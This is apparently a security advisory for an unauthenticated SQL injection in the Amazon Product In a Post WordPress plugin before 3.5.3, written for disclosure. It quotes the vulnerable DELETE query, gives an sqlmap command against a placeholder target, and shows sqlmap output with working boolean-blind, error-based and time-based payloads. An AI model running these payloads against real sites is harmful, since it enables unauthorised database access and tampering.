Amazon Product In a Post Plugin < 3.5.3 – Unauthenticated SQL Injection

Description

This plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks.

Proof of Concept

inc/amazon-product-in-a-post-styles-product.php, line 40:
$tempswe = $wpdb->query("DELETE FROM {$wpdb->prefix}amazoncache WHERE Cache_id ='{$wp->query_vars['appip-cache-id']}' LIMIT 1;");


sqlmap -u "http://TARGET/index.php?appip-cache-del=dodel&appip-cache-id=2" -p appip-cache-id --dbms mysql

[02:00:47] [INFO] heuristic (basic) test shows that GET parameter 'appip-cache-id' might be injectable (possible DBMS: 'MySQL')
[02:00:47] [INFO] heuristic (XSS) test shows that GET parameter 'appip-cache-id' might be vulnerable to XSS attacks
[02:00:54] [INFO] GET parameter 'appip-cache-id' seems to be 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable 
[02:00:54] [INFO] GET parameter 'appip-cache-id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
sqlmap identified the following injection points with a total of 271 HTTP(s) requests:
---
Parameter: appip-cache-id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: appip-cache-del=dodel&appip-cache-id=2' RLIKE (SELECT (CASE WHEN (1323=1323) THEN 2 ELSE 0x28 END)) AND 'kTyF'='kTyF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT 4609 FROM(SELECT COUNT(*),CONCAT(0x7162627a71,(SELECT (CASE WHEN (4609=4609) THEN 1 ELSE 0 END)),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GuOh'='GuOh

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))hekc) AND 'oIki'='oIki
---